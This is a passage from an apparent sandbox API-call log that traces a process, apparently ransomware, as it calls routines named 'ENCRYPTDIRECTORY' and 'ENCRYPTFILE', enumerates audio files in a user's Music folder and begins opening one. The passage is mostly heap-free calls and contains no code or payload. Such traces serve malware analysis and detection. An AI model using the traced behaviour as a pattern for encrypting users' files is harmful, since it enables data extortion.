lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0117.888] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23f0 | out: hHeap=0x1780000) returned 1 [0117.888] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0117.888] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac440 [0117.888] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0117.888] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac440 | out: hHeap=0x1780000) returned 1 [0117.888] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0117.888] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8d98 | out: hHeap=0x1780000) returned 1 [0117.888] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca058 | out: hHeap=0x1780000) returned 1 [0117.888] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9fb0 | out: hHeap=0x1780000) returned 1 [0117.888] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23e0 | out: hHeap=0x1780000) returned 1 [0117.889] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0117.889] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca160 | out: hHeap=0x1780000) returned 1 [0117.889] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0117.889] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0117.889] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf888 | out: hHeap=0x1780000) returned 1 [0117.889] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ec0 | out: hHeap=0x1780000) returned 1 [0117.889] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9fc8 | out: hHeap=0x1780000) returned 1 [0117.889] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0117.889] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0117.889] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0117.889] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f08 | out: hHeap=0x1780000) returned 1 [0117.889] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0117.889] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0117.889] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4050e78 | out: hHeap=0x1780000) returned 1 [0117.889] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2440 | out: hHeap=0x1780000) returned 1 [0117.889] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0d0 | out: hHeap=0x1780000) returned 1 [0117.889] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f98 | out: hHeap=0x1780000) returned 1 [0117.889] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0117.889] PeekMessageW (in: lpMsg=0x144f78c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f78c) returned 0 [0117.889] PeekMessageW (in: lpMsg=0x144f78c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f78c) returned 0 [0117.889] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2470 [0117.889] CharUpperBuffW (in: lpsz="ENCRYPTDIRECTORY", cchLength=0x10 | out: lpsz="ENCRYPTDIRECTORY") returned 0x10 [0117.889] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391d58 | out: hHeap=0x1780000) returned 1 [0117.889] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0117.889] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca160 | out: hHeap=0x1780000) returned 1 [0117.889] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0117.889] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391bd0 | out: hHeap=0x1780000) returned 1 [0117.889] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca028 | out: hHeap=0x1780000) returned 1 [0117.889] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e08 | out: hHeap=0x1780000) returned 1 [0117.889] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0117.890] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2500 | out: hHeap=0x1780000) returned 1 [0117.890] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ec0 | out: hHeap=0x1780000) returned 1 [0117.890] CharUpperBuffW (in: lpsz="_FILELISTTOARRAY", cchLength=0x10 | out: lpsz="_FILELISTTOARRAY") returned 0x10 [0117.890] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391b98 | out: hHeap=0x1780000) returned 1 [0117.890] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0117.890] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2340 | out: hHeap=0x1780000) returned 1 [0117.890] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2440 | out: hHeap=0x1780000) returned 1 [0117.890] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2430 | out: hHeap=0x1780000) returned 1 [0117.890] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9fb0 | out: hHeap=0x1780000) returned 1 [0117.890] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0117.890] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0d0 | out: hHeap=0x1780000) returned 1 [0117.890] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca130 | out: hHeap=0x1780000) returned 1 [0117.890] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca100 | out: hHeap=0x1780000) returned 1 [0117.890] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2410 | out: hHeap=0x1780000) returned 1 [0117.890] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca130 | out: hHeap=0x1780000) returned 1 [0117.890] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0117.890] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24c0 | out: hHeap=0x1780000) returned 1 [0117.890] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0117.890] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0117.890] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0117.890] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca280 | out: hHeap=0x1780000) returned 1 [0117.890] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3b8 | out: hHeap=0x1780000) returned 1 [0117.890] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0117.890] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0117.890] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0117.891] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2410 | out: hHeap=0x1780000) returned 1 [0117.891] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24c0 | out: hHeap=0x1780000) returned 1 [0117.891] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0117.891] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0117.891] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8de0 | out: hHeap=0x1780000) returned 1 [0117.891] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24c0 | out: hHeap=0x1780000) returned 1 [0117.891] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0117.891] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0117.891] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0117.891] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8d98 | out: hHeap=0x1780000) returned 1 [0117.891] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0117.891] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0117.891] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3b8 | out: hHeap=0x1780000) returned 1 [0117.891] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0117.891] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0117.891] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca298 | out: hHeap=0x1780000) returned 1 [0117.891] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0117.891] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0117.891] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac600 | out: hHeap=0x1780000) returned 1 [0117.891] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0117.891] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ee8 | out: hHeap=0x1780000) returned 1 [0117.891] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2360 | out: hHeap=0x1780000) returned 1 [0117.891] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0117.891] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0117.891] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0117.891] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca298 | out: hHeap=0x1780000) returned 1 [0117.891] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24c0 | out: hHeap=0x1780000) returned 1 [0117.891] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0117.891] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f48 | out: hHeap=0x1780000) returned 1 [0117.891] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0117.891] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0117.892] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0117.892] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0117.892] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0117.892] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0117.892] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0117.892] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2370 | out: hHeap=0x1780000) returned 1 [0117.892] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0117.892] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e08 | out: hHeap=0x1780000) returned 1 [0117.892] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0117.892] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0117.892] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0117.892] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2360 | out: hHeap=0x1780000) returned 1 [0117.892] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\tG2O\\" (normalized: "c:\\users\\fd1hvy\\music\\tg2o")) returned 0x10 [0117.892] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca298 | out: hHeap=0x1780000) returned 1 [0117.892] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0117.892] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0117.892] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0117.892] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0117.892] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0117.892] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0117.892] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0117.892] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0117.892] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0117.892] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24c0 | out: hHeap=0x1780000) returned 1 [0117.892] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0117.892] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0117.892] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca388 | out: hHeap=0x1780000) returned 1 [0117.892] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0117.892] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa68 | out: hHeap=0x1780000) returned 1 [0117.892] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0117.893] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0117.893] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0117.893] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0117.893] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0117.893] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24c0 | out: hHeap=0x1780000) returned 1 [0117.893] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0117.893] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0117.893] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0117.893] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0117.893] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0117.893] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0117.893] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0117.893] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0117.893] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24c0 | out: hHeap=0x1780000) returned 1 [0117.893] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\tG2O\\*", lpFindFileData=0x144ea50 | out: lpFindFileData=0x144ea50*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6c872b50, ftCreationTime.dwHighDateTime=0x1d5e3f8, ftLastAccessTime.dwLowDateTime=0xd4b41fc0, ftLastAccessTime.dwHighDateTime=0x1d5e944, ftLastWriteTime.dwLowDateTime=0xd4b41fc0, ftLastWriteTime.dwHighDateTime=0x1d5e944, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x43ca298, cFileName=".", cAlternateFileName="")) returned 0x41ac180 [0117.893] FindNextFileW (in: hFindFile=0x41ac180, lpFindFileData=0x144ea50 | out: lpFindFileData=0x144ea50*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6c872b50, ftCreationTime.dwHighDateTime=0x1d5e3f8, ftLastAccessTime.dwLowDateTime=0xd4b41fc0, ftLastAccessTime.dwHighDateTime=0x1d5e944, ftLastWriteTime.dwLowDateTime=0xd4b41fc0, ftLastWriteTime.dwHighDateTime=0x1d5e944, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x43ca298, cFileName="..", cAlternateFileName="")) returned 1 [0117.893] FindNextFileW (in: hFindFile=0x41ac180, lpFindFileData=0x144ea50 | out: lpFindFileData=0x144ea50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2fdfec0, ftCreationTime.dwHighDateTime=0x1d5e49e, ftLastAccessTime.dwLowDateTime=0x978232c0, ftLastAccessTime.dwHighDateTime=0x1d5ea3b, ftLastWriteTime.dwLowDateTime=0x978232c0, ftLastWriteTime.dwHighDateTime=0x1d5ea3b, nFileSizeHigh=0x0, nFileSizeLow=0x747e, dwReserved0=0x0, dwReserved1=0x43ca298, cFileName="KxIfNFq_eT6K4Yywd.m4a", cAlternateFileName="KXIFNF~1.M4A")) returned 1 [0117.893] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0117.893] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8ac8 | out: hHeap=0x1780000) returned 1 [0117.893] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0117.893] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca298 | out: hHeap=0x1780000) returned 1 [0117.893] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0117.893] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa68 | out: hHeap=0x1780000) returned 1 [0117.893] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0117.893] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0117.893] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea040 | out: hHeap=0x1780000) returned 1 [0117.894] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2360 | out: hHeap=0x1780000) returned 1 [0117.894] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0117.894] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0117.894] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0117.894] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0117.894] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0117.894] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa68 | out: hHeap=0x1780000) returned 1 [0117.894] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0117.894] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0117.894] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0117.894] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9128 | out: hHeap=0x1780000) returned 1 [0117.894] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0117.894] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0117.894] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0117.894] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9350 | out: hHeap=0x1780000) returned 1 [0117.894] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0117.894] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2360 | out: hHeap=0x1780000) returned 1 [0117.894] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ec8 | out: hHeap=0x1780000) returned 1 [0117.894] FindNextFileW (in: hFindFile=0x41ac180, lpFindFileData=0x144ea38 | out: lpFindFileData=0x144ea38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x38ea4ef0, ftCreationTime.dwHighDateTime=0x1d5e0e5, ftLastAccessTime.dwLowDateTime=0x944918e0, ftLastAccessTime.dwHighDateTime=0x1d5e53a, ftLastWriteTime.dwLowDateTime=0x944918e0, ftLastWriteTime.dwHighDateTime=0x1d5e53a, nFileSizeHigh=0x0, nFileSizeLow=0xb9fc, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="lJ_RJDQgish84bCgxK.wav", cAlternateFileName="LJ_RJD~1.WAV")) returned 1 [0117.895] FindNextFileW (in: hFindFile=0x41ac180, lpFindFileData=0x144ea38 | out: lpFindFileData=0x144ea38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc3d50a20, ftCreationTime.dwHighDateTime=0x1d5e269, ftLastAccessTime.dwLowDateTime=0x90642aa0, ftLastAccessTime.dwHighDateTime=0x1d5ec9a, ftLastWriteTime.dwLowDateTime=0x90642aa0, ftLastWriteTime.dwHighDateTime=0x1d5ec9a, nFileSizeHigh=0x0, nFileSizeLow=0xee2a, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="vgfSxUhhzUZpNrrLJ3hR.mp3", cAlternateFileName="VGFSXU~1.MP3")) returned 1 [0117.895] FindNextFileW (in: hFindFile=0x41ac180, lpFindFileData=0x144ea38 | out: lpFindFileData=0x144ea38*(dwFileAttributes=0x43c34c0, ftCreationTime.dwLowDateTime=0x43e2330, ftCreationTime.dwHighDateTime=0xdf0000, ftLastAccessTime.dwLowDateTime=0xdf01c4, ftLastAccessTime.dwHighDateTime=0x1e, ftLastWriteTime.dwLowDateTime=0xdf0000, ftLastWriteTime.dwHighDateTime=0x20, nFileSizeHigh=0x43c356c, nFileSizeLow=0x43c34dc, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="", cAlternateFileName="мńဓ+\x10")) returned 0 [0117.895] FindClose (in: hFindFile=0x41ac180 | out: hFindFile=0x41ac180) returned 1 [0117.895] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="|KxIfNFq_eT6K4Yywd.m4a|lJ_RJDQgish84bCgxK.wav|vgfSxUhhzUZpNrrLJ3hR.mp3", cchCount1=70, lpString2="", cchCount2=0) returned 3 [0117.895] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0117.895] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\tG2O\\KxIfNFq_eT6K4Yywd.m4a", lpFindFileData=0x144ee20 | out: lpFindFileData=0x144ee20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2fdfec0, ftCreationTime.dwHighDateTime=0x1d5e49e, ftLastAccessTime.dwLowDateTime=0x978232c0, ftLastAccessTime.dwHighDateTime=0x1d5ea3b, ftLastWriteTime.dwLowDateTime=0x978232c0, ftLastWriteTime.dwHighDateTime=0x1d5ea3b, nFileSizeHigh=0x0, nFileSizeLow=0x747e, dwReserved0=0xdf0b28, dwReserved1=0x8, cFileName="KxIfNFq_eT6K4Yywd.m4a", cAlternateFileName="KXIFNF~1.M4A")) returned 0x41ac280 [0117.895] FindClose (in: hFindFile=0x41ac280 | out: hFindFile=0x41ac280) returned 1 [0117.895] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0117.895] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0117.895] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0117.896] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0117.896] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43ca718, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0117.896] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\tG2O\\KxIfNFq_eT6K4Yywd.m4a" (normalized: 